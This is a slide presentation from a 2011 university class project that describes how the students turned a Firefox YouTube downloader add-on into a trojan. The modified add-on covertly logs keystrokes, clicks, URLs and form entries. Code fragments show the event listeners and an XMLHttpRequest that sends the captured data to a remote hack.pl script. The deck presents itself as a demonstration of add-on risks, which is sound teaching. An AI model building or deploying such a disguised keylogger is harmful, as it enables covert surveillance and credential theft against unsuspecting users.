A Simple Trojan Mozilla Firefox Add-on - Our Project Presentation on how to make a Trojan Addon for Firefox.
For Education Purpose Only. No one is encouraged to undergo unethical engineering. This is to show that there can be vulnerabilities.
We have edited the GOOD existing addon and added some trojan code.
Presentation on how to chat with PDF using ChatGPT code interpreter
A Simple Trojan Mozilla Firefox Add-on
1. Presented by
Suresh K
Abin John George
Nimish Joseph
Bairaginath Behera
Arunanand T A
M.Tech. 2011-13 CSE, Dept. of CSE, NIT Calicut, Kerala, IN, 673 601
2. Introduction
What’s an add-on?
That adds some feature to the existing system
What’s a Trojan?
That looks useful, but does unfavorable actions without our
knowledge
11/16/2011 Dept. of CSE, NIT Calicut 2
3. Overview
Existing Add-on vs Ours
Our Add-on: Features
Challenges & Design
Working as an abstraction
Demonstration
Conclusions
References
11/16/2011 Dept. of CSE, NIT Calicut 3
4. Abstract
Our add-on works as a normal YouTube video
downloader, but it is a Trojan
It will capture your web activities like URLs
visited, web form entries, etc. and shall send to a
remote server
It will, at the server, identify and store the IPs of the
hosts
11/16/2011 Dept. of CSE, NIT Calicut 4
5. Existing Add-on vs Our Add-on
Easy YouTube Downloader [1]
Helps download videos from YouTube
We modified the source and added some js into the
source
11/16/2011 Dept. of CSE, NIT Calicut 5
6. Features of our Add-on
Still, works as YouTube Downloader
Monitor click [2] and keyboard[2] events
Sends all the URLs visited and events, which’s first
stored in a buffer variable
Keeps track of IP address of hosts, at the server
11/16/2011 Dept. of CSE, NIT Calicut 6
7. System Requirements
Operating System: Windows/Linux
Browser: Mozilla Firefox 1.5+
Javascript Enabled [3]
11/16/2011 Dept. of CSE, NIT Calicut 7
8. Challenges
Understanding the working of existing add-on.
Where and how to modify the add-on?
How to add event listeners?
How to send captured information to the remote
server?
11/16/2011 Dept. of CSE, NIT Calicut 8
9. Design
We added some blocks of codes into “script-
compiler.js” file
The following methods/functions were created:
Two Event Listeners – KeyPress and Click to the window
object
sendHref(href)
addKey(Event)
clickBuff(Event)
sendBUFF(BUFF)
11/16/2011 Dept. of CSE, NIT Calicut 9
10. Design – Contd…
Two Event Listeners – KeyPress and Click to the
window object
WinObj.addEventListener("keypress",
function(event){ BUFF.addKey(event); },
true); [4]
WinObj.addEventListener("click",
function(event){ CLICK.Event(event); },
true); [4]
11/16/2011 Dept. of CSE, NIT Calicut 10
11. Design – Contd…
Retrieve href from window object
sendHref(href)
If href != "about:blank” then
Add href to the buffer
Call sendBuff() function
11/16/2011 Dept. of CSE, NIT Calicut 11
12. Design – Contd…
addKey(Event)
This is an key event handler function
Once a key is pressed, this function will be automatically
called (Callback function)
From the Event object, we can extract key-press
information
Add this key to the buffer
11/16/2011 Dept. of CSE, NIT Calicut 12
13. Design – Contd…
clickBuff (Event)
Why we included this clickBuff()?
This is a click event handler function
Once a click happens, observe its click target
Store the click target in buffer
While submit event happens, we will fetch the target values of
click events stored.
11/16/2011 Dept. of CSE, NIT Calicut 13
14. Design – Contd…
sendBuff(buff)
Using Ajax (XMLHttpRequest)
If buff is full or submit event happens, buff is sent to the server
var req = new XMLHttpRequest();
req.open("GET", "http://www.mamboo.in/cgi-
bin/hack.pl?keys=" + hack, true);
11/16/2011 Dept. of CSE, NIT Calicut 14
15. Working as an abstraction
11/16/2011 Dept. of CSE, NIT Calicut 15
16. Server Side Set-up
A Perl file for Receiving ‘buffer’ data
Writes to the text file at the server
$ENV{} hash of Perl (QUERY_STRING and REMOTE_ADDR)
Timestamp and IP Information is retrieved and stored
11/16/2011 Dept. of CSE, NIT Calicut 16
17. As a package…
Available as an .xpi package
Open the file using Mozilla Firefox
Restart, and start using
11/16/2011 Dept. of CSE, NIT Calicut 17
18. Demonstration
We will now have a demonstration of our project
http://www.youtube.com/watch?v=WiVZ8dI2stc
11/16/2011 Dept. of CSE, NIT Calicut 18
19. Future Enhancements
We can enhance the server side for further processing
of retrieved information
Browser cookie details can be accessed
11/16/2011 Dept. of CSE, NIT Calicut 19
20. Conclusions
The project aimed at creating a trojan add-on, which is
successfully completed
This project is intended for revealing the
vulnerabilities caused by untrusted add-ons
11/16/2011 Dept. of CSE, NIT Calicut 20
22. Visit…
Comprehensive details of our project is available at
(Requires Login):
https://sites.google.com/site/nitcmtech2013cs/semester
-1/is-project-sem1/trojan
Or shortly,
http://tinyurl.com/taddon
11/16/2011 Dept. of CSE, NIT Calicut 22